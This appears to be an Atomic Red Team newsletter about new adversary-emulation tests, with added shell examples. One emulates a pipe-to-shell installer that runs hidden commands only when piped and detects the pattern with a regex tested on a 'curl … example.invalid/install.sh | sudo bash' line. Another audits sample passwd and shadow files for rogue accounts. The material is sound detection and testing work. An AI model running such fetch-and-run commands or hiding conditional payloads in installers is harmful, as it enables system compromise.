The latest from Atomic Red Team

WATCH: Atomic testing with John Hammond

The security mastermind himself has gone nuclear! John Hammond gives a ground-up overview of BlueSpawn, an open source EDR stand-in, and shows how it picks up on Atomic Red Team tests. Speaking on the strengths of MITRE's ATT&CK framework and on defense logic, John's insights are unique and a fun listen.
TRY: Mac Monitor

It's here: Mac Monitor is a new free tool for telemetry collection and dynamic system analysis on macOS endpoints. Run against common macOS atomic tests, Mac Monitor provides simple, readable output for examining the forensic artifacts left behind on compromised systems. In this blog post, we execute the AppleScript atomic tests to showcase the telemetry Mac Monitor collects for that behavior.
LEARN: Attack emulation tools with AntiSyphon

Another excellent AntiSyphon training from maintainer Carrie Roberts is open for registration! The course is for all experience levels and covers attack emulation and visualization, including Atomic Red Team, Caldera, Vectr, and more. It suits seasoned and aspiring security practitioners alike.
READ: Developing and testing cloud-based detections

Researcher and maintainer Jose Hernandez writes about integrating atomic testing with Lacework to build effective detections and customize LQL policies.
T1059.004: Pipe-to-shell

These new tests contributed by biot-2131 emulate commands piped into the Unix shell. An adversary may publish a useful utility, or subvert the CI/CD pipeline of a legitimate utility developer, whose install instructions require or suggest piping a curl download directly into bash. Because the script is executed as it is downloaded and never lands on disk for review, the adversary can also take advantage of this blind install method and selectively run extra commands from the install script.
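To make the two halves of that paragraph concrete, here is an added example (my own, not one of the Atomic Red Team tests) that runs entirely offline. A constructed installer string stands in for whatever an adversary-controlled URL would serve, and printf stands in for `curl -fsSL URL`; the installer behaves differently when it arrives on stdin than when it is run from a file on disk, which is exactly the property a blind install gives the attacker. A small detection helper then flags process command lines that pipe a download tool into a shell. The regex and the `example.invalid` URL are illustrative assumptions.

```shell
#!/bin/sh
# Pipe-to-shell emulation (T1059.004), offline. INSTALLER is a constructed
# script standing in for what an adversary-controlled URL would serve.
INSTALLER='#!/bin/sh
echo "installing utility"
# When the script arrives on stdin there is no file on disk for anyone to
# read first: $0 is just the shell name. That is the blind install the
# adversary can key on, running extra commands only in that case.
if [ ! -f "$0" ]; then
  echo "EXTRA"        # stands in for the hidden payload
fi'

# The pattern the tests emulate: download | shell. printf replaces curl.
run_piped() {
  printf '%s\n' "$INSTALLER" | sh
}

# Control: the same script saved to disk and run as a file, as a careful
# operator would do after reviewing it. Prints no EXTRA line.
run_from_file() {
  tmp=$(mktemp)
  printf '%s\n' "$INSTALLER" > "$tmp"
  sh "$tmp"
  rm -f "$tmp"
}

# Detection side: return 0 when a process command line pipes curl or wget
# into a shell (optionally through sudo), 1 otherwise. Illustrative regex.
looks_like_pipe_to_shell() {
  printf '%s' "$1" | grep -Eq \
    '(^|[[:space:];&])(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z|da|k)?sh([[:space:]]|$)'
}

# Demonstration when run directly.
run_piped
run_from_file
if looks_like_pipe_to_shell 'curl -fsSL https://example.invalid/install.sh | sudo bash'; then
  echo "flagged"
else
  echo "not flagged"
fi
```

The file-on-disk check is one of several ways a script can tell it is being piped; the point is that the reviewer and the executor see different things. On the detection side, match on the parent shell's command line or on a process-tree relationship (shell whose stdin is a pipe from curl), since the installer itself leaves no file to hash.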
T1204.003: Malicious image

Contributor msdlearn has added a new test that emulates an adversary's backdoored or malicious container image, a common strategy in cloud and containerized environments. Because the victim pulls and runs the image themselves, this skips the Initial Access phase and leads directly to execution of malicious code or cryptocurrency mining.
T1078.003: Local accounts

Another set of tests from contributor biot-2131 covers the creation, reactivation, and repurposing of system accounts on Linux systems. A valid local account can allow lateral movement across a network or privilege escalation.
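As an added example (mine, not part of the Atomic Red Team tests), the audit below is the kind of check that surfaces all three of those outcomes after the tests run: a created root-equivalent account, a system account repurposed with a login shell, and a system account reactivated by giving it a real password hash. It runs against constructed /etc/passwd and /etc/shadow samples written to temp files; the account names, hashes, and the UID 1000 boundary for "system account" are assumptions for the example.

```shell
#!/bin/sh
# Local-account audit for T1078.003 on Linux, run here against constructed
# passwd/shadow samples (not copied from a real host). Findings:
#   extra-uid0       a second UID 0 account (created root-equivalent)
#   system-shell     a system account (UID below 1000) with a login shell
#   system-unlocked  a system account whose shadow field holds a real hash
#                    instead of a locked marker (! or *), i.e. reactivated
# In the samples, games was repurposed, backup reactivated, sysadm created.
write_samples() {
  cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
sysadm:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF
  cat > "$2" <<'EOF'
root:$6$saltsalt$hashhash:19500:0:99999:7:::
daemon:*:19500:0:99999:7:::
games:!:19500:0:99999:7:::
backup:$6$saltsalt$hashhash:19500:0:99999:7:::
sysadm:$6$saltsalt$hashhash:19500:0:99999:7:::
alice:$6$saltsalt$hashhash:19500:0:99999:7:::
EOF
}

# audit_accounts PASSWD SHADOW -> one "reason user" line per finding.
# On a live host: audit_accounts /etc/passwd /etc/shadow (root needed).
audit_accounts() {
  awk -F: -v SYS_MAX=1000 '
    NR == FNR { hash[$1] = $2; next }        # pass 1: shadow -> hash[user]
    {                                         # pass 2: passwd
      user = $1; uid = $3 + 0; shell = $7
      if (uid == 0 && user != "root") print "extra-uid0", user
      if (user == "root" || uid >= SYS_MAX) next
      if (shell !~ /(nologin|false)$/) print "system-shell", user
      h = hash[user]
      if (h != "" && h !~ /^[!*]/) print "system-unlocked", user
    }' "$2" "$1"
}

# Demonstration when run directly.
passwd_sample=$(mktemp); shadow_sample=$(mktemp)
write_samples "$passwd_sample" "$shadow_sample"
audit_accounts "$passwd_sample" "$shadow_sample"
rm -f "$passwd_sample" "$shadow_sample"
```

Run periodically and diffed against a known-good baseline, this catches the end state of the tests; pair it with auth log or auditd monitoring of useradd, usermod, and passwd to catch the moment of change.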
T1531: Account access removal

Contributor D4rkCiph3r has added a series of tests that change user passwords and delete user accounts on macOS using dscl and sysadminctl. Locking legitimate users out this way can impede incident response and recovery efforts during certain types of attacks, especially ransomware.
Top contributors
- biot-2131
- clr2of8
- josehelps
- well123cs
Threat Detection Series Live: San Francisco

Put on a sweater and prepare for the live event of a lifetime! The Threat Detection Series Live is coming to Bespoke San Francisco with insights on common threats, useful detection opportunities, and, of course, testing.